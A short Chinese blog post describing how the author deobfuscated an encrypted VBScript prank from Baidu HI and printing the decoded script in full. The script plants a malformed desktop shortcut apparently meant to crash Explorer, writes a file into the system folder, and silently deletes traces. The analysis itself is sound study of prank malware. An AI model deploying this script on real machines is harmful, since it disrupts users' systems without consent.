就是我之前在百度HI上看到的加密的恶作剧程序。之前解密的时候犯了一个很愚蠢的错误,竟然把循环的次数看错了。
那个上面贴出的程序运行后生成一个EZJ.VBE文件,用Script Decoder将其解码成EZJ.VBS,然后将
Execute FG5bhgNStr
替换为
Set file = HgyuR5Y3v.OpenTextFile((zhVVB4tr6 - 16535685)&".vbs",2,True) file.Write FG5bhgNStr
双击运行,得到501个vbs文件,其中70.vbs就是解密后的代码,如下
Rem EnCode_4.0 By baomaboy On Error Resume Next Set sexc4rt = WScript.CreateObject("WScript.Shell") Set CcYdrdTE = CreateObject("Scripting.FileSystemObject") RName = Int((9876543210 - 1234567890 + 1) * Rnd + 1234567890) UrlFile = CcYdrdTE.BuildPath(sexc4rt.SpecialFolders("Desktop"),"\"&RName&".url") Set UrlStr = CcYdrdTE.OpenTextFile(UrlFile,2,True) UrlStr.WriteLine("[InternetShortcut]"&vbcrlf&"url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:") UrlStr.Close WScript.Sleep 5000 Set OUrl = CcYdrdTE.OpenTextFile(CcYdrdTE.BuildPath(CcYdrdTE.GetSpecialFolder(1),"ShowDisktop.SCF"),2,True) OUrl.Write("[Shell]"&vbcrlf&"Command=2"&vbcrlf&"IconFile=explorer.exe,3"&vbcrlf&"[Taskbar]"&vbcrlf&"command=ToggleDesktop") OUrl.Close sexc4rt.Run("ShowDisktop.SCF") WScript.Sleep 16365 sexc4rt.Run("%COMSPEC% /C Del "&CcYdrdTE.GetFile(UrlFile).ShortPath),vbHide WScript.Sleep 1000 sexc4rt.Run("explorer.exe") WScript.Quit(0)
唉,因为一个很低级的错误,纠结了好几天。